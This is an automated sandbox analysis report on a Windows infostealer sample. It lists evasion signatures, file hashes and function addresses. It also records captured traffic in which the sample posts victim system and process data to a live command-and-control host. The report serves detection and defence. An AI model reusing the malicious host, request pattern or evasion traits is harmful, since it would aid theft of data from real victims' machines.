Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TX5LAYBZRI.exe

Overview

General Information

Sample name:TX5LAYBZRI.exe
renamed because original name is a hash value
Original sample name:94dfcba69551e571570208f53fac90d6.exe
Analysis ID:1582833
MD5:94dfcba69551e571570208f53fac90d6
SHA1:2280c39c446cef46be9388ff3124f6e9c61f7622
SHA256:41e22386a926fc18dbc6d5a3b37fb560463965dd7539c9cf0b67974dd69882fe
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • TX5LAYBZRI.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\TX5LAYBZRI.exe" MD5: 94DFCBA69551E571570208F53FAC90D6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: TX5LAYBZRI.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lseAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZAvira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: TX5LAYBZRI.exeVirustotal: Detection: 47%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: TX5LAYBZRI.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00BBDCF0
Source: TX5LAYBZRI.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00BFA5B0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00BFB560
Source: TX5LAYBZRI.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00B9255D
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00B929FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502080Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 38 33 31 36 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.200.57.114 34.200.57.114
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C5A8C0 recvfrom,0_2_00C5A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502080Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 38 33 31 36 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:47:07 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:47:08 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2124954630.0000000002112000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125285281.0000000002124000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125032525.000000000211F000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139392005.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
Source: TX5LAYBZRI.exe, 00000000.00000003.2125569370.00000000020B2000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125601591.00000000020B7000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139117572.00000000020B9000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: TX5LAYBZRI.exe, 00000000.00000003.2124979245.00000000020C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: TX5LAYBZRI.exe, 00000000.00000003.2125569370.00000000020B2000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125601591.00000000020B7000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139117572.00000000020B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: TX5LAYBZRI.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: TX5LAYBZRI.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TX5LAYBZRI.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: TX5LAYBZRI.exeStatic PE information: section name:
Source: TX5LAYBZRI.exeStatic PE information: section name: .idata
Source: TX5LAYBZRI.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BA05B00_2_00BA05B0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BA6FA00_2_00BA6FA0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C5B1800_2_00C5B180
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BCF1000_2_00BCF100
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C600E00_2_00C600E0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F1E0500_2_00F1E050
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F1A0000_2_00F1A000
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BF62100_2_00BF6210
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C5E3E00_2_00C5E3E0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C5C3200_2_00C5C320
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C604200_2_00C60420
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EE44100_2_00EE4410
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9E6200_2_00B9E620
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BFA7F00_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F147800_2_00F14780
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C5C7700_2_00C5C770
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EF67300_2_00EF6730
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C4C9000_2_00C4C900
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9A9600_2_00B9A960
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BA49400_2_00BA4940
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00D66AC00_2_00D66AC0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00E4AAC00_2_00E4AAC0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F08BF00_2_00F08BF0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9CBB00_2_00B9CBB0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00D24B600_2_00D24B60
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00E4AB2C0_2_00E4AB2C
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F1CC900_2_00F1CC90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F0CD800_2_00F0CD80
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F14D400_2_00F14D40
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EAAE300_2_00EAAE30
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C5EF900_2_00C5EF90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C58F900_2_00C58F90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EE2F900_2_00EE2F90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BB4F700_2_00BB4F70
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BA10E60_2_00BA10E6
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EFD4300_2_00EFD430
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F035B00_2_00F035B0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EE56D00_2_00EE56D0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F217A00_2_00F217A0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C498800_2_00C49880
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EE99200_2_00EE9920
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F13A700_2_00F13A70
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F01BD00_2_00F01BD0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BD1BE00_2_00BD1BE0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00EF7CC00_2_00EF7CC0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00E49C800_2_00E49C80
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BA5DB00_2_00BA5DB0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BB5EB00_2_00BB5EB0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BA3ED00_2_00BA3ED0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00B9C960 appears 37 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00BD5340 appears 50 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00BD4F40 appears 335 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00BD4FD0 appears 289 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00C744A0 appears 76 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00BACCD0 appears 55 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00B975A0 appears 698 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00B973F0 appears 111 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00D47220 appears 96 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00D6CBC0 appears 104 times
